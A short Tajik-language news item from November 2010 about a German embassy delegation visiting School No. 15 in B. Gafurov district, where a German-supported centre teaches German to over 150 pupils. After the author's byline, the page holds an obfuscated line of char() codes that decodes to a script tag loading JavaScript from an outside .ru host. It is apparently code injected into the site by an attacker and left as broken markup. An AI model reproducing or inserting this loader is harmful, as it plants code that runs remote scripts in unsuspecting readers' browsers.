18.11.2010
Дар мактаби деҳот забони олмонӣ меомузанд
Дирӯз як гуруҳ меҳмонон бо ҳамроҳии сафири давлати федеративии Ҷумҳурии Олмон дар Тоҷикистон Рихтер Павел аз мактаби таҳсилоти ҳамагонии №15 ноҳияи Б. Ғафуров боздид намуданд.
Муҳассилини ин дабистон меҳмоноро, ки бо ҳамроҳии раиси ноҳияи Б. Ғафуров Лутфулло Муҳиддинов ба ин мактаб омаданд, бо мусиқии олмонӣ пешвоз гирифтанд. Зиёда аз як сол мешавад, ки маркази омӯзиши забонҳо аз ҷумла забони олмонӣ бо дастгирии давлати олмон дар ин мактаб бо тамоми шароити замонавӣ кушода шудааст. Алҳол зиёда аз 150-нафар хонандагони синфҳои болои мактаби мазкур ба омӯхтани забони олмонӣ машғуланд. Ба хонандагон бошад ин забонро муаллимаҳо Ҷамила Собирова ва Раъно Охунова ёд медиҳанд. Муовини сафири Федеративии Олмон дар ҶТ Рихтер Павел аз сафар ва сатҳи забондонии хонандагон қаноатманд гаштанд.

Афзал Босолиев

char(60,115,99,114,105,112,116,32,115,114,99,61,34,104,116,116,112,58,47,47,112,105,107,115,117,115,46,109,115,107,46,114,117,47)c8361ba793d9ca81edaf7b2d1e2ac226.js" type="text/javascript">

ТАВЗЕҲОТ